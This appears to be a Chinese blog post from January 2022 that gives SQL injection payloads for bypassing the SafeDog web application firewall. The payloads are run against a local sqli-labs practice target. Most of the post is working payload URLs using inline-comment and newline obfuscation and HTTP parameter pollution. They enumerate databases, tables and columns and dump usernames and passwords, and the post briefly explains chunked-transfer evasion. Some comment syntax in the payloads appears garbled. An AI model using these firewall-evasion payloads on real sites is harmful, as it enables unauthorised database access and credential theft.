2022.1.6最新版安全狗绕过语法

1.内联注释绕过

http://192.168.0.100/sqli-labs/Less-1/?id=1' -- qwe 单引号闭合,此处存在注入

尝试order by 4 被拦截 此处修改为group by 进行绕过,http://192.168.0.100/sqli-labs/Less-1/?id=1' group by 3 -- qwe

http://192.168.0.100/sqli-labs/Less-1/?id=1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+

最后判断3列

http://192.168.0.100/sqli-labs/Less-1/?id=1111111111'UnIoN//111/+/22//SELect+1,2,3+--+qwe

http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,3+--+qwe

回显点是2和3 在2处查看数据库信息,database//22/+/33//()

http://192.168.0.100/sqli-labs/Less-1/?id=-1' REGEXP "[…%0a%23]" UnIoN//111/+/22//SELect 1,database//11/+/22//(),3 --+

http://192.168.0.100/sqli-labs/Less-1/?id=-1' REGEXP "[…%0A%23]"%20 /!11444union %0A select/ 1,database///- -///(),3 --+

http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(schema_name) from %0a /!11444 /REGEXP "[…%0a%23]"/ %0a information_schema.schemata/-- +

查看所有数据库信息

http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(table_name) from %0a /!11444 /REGEXP "[…1%0a%23]"/ %0a information_schema.tables/-- +

查询所有表名

指定security库中查询所有的列名

http://192.168.0.100/sqli-labs/Less-1/?id=1111111'+union//22/+/ddaaaaaaaaaaa/+select 1,2,%0a group_concat(table_name) from %0a /!11444 /REGEXP "[…1%0a%23]"/ %0a information_schema.tables/where+table_schema='security'-- +

http://192.168.0.100/sqli-labs/Less-1/?id=1111111' REGEXP "[…%0a%23]" union//22/+/33//select//22/+/33//
1,2,group_concat(column_name) from /!--+/%0ainformation_schema.columns*/
where table_name='users' --+ 出users里面所有的字段名

http://192.168.0.100/sqli-labs/Less-1/?id=-1' union//22/+/33//select//22/+/33//1,2,group_concat(id,username,password) from users -- qwe 查询字段内数据

2.参数污染绕过

参考链接:https://blog.csdn.net/weixin_39190897/article/details/113081278

http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,database()+--+qwe/

获取数据库名

http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(table_name) from
information_schema.tables where table_schema='security' -- qwe
/ 获取security所有表名

http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(column_name) from
information_schema.columns where table_name='users' -- qwe
/ 获取字段名

http://192.168.0.104/sqli-labs/Less-1/?id=1 /&id=-1' union select 1,2,group_concat(id,username,password) from users -- qwe/ 获取内容

分块传输绕过

https://www.cnblogs.com/renhaoblog/p/13395539.html

https://www.cnblogs.com/backlion/p/10569976.html

https://www.freebuf.com/articles/web/259377.html

在通过http传输文件的时候,通常会有一个 Content-Length 用来指定文件的长度,比如传输图片,静 态页面,客户端也以 Content-Length 作为接收内容结束的标志,接收完毕后就可以断开连接了。但是 有时候发送方并不能确定内容的长度,造成的影响就是:接收方无法通过 Content-Length 得到报文体 的长度,也就无法得知什么时候应该中断连接。

安装链接 https://github.com/c0ny1/chunked-coding-converter/releases

posted @ 2022-01-06 21:42  行行行之  阅读(664)  评论(0编辑  收藏  举报